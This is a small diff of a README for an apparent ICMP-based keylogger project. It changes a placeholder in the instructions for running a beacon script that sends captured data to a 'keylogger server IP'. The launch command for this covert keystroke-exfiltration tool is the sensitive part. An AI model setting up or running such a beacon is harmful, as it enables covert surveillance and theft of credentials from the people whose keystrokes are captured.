Krptyk/ICMPKeyLogger/README.md

 Use the Description field of the relevant interface.

 ### Running the Beacon
 Run the Beacon component using the following command.
-Replace `[Description from ipconfig /all]` with the actual description of your network interface and `[keylogger server IP]` with the IP address of the server.
+Replace `[interface]` with the actual description of your network interface and `[keylogger server IP]` with the IP address of the server.

 ```py ICMPbeacon.py -i "[interface]" -d [keylogger server IP]```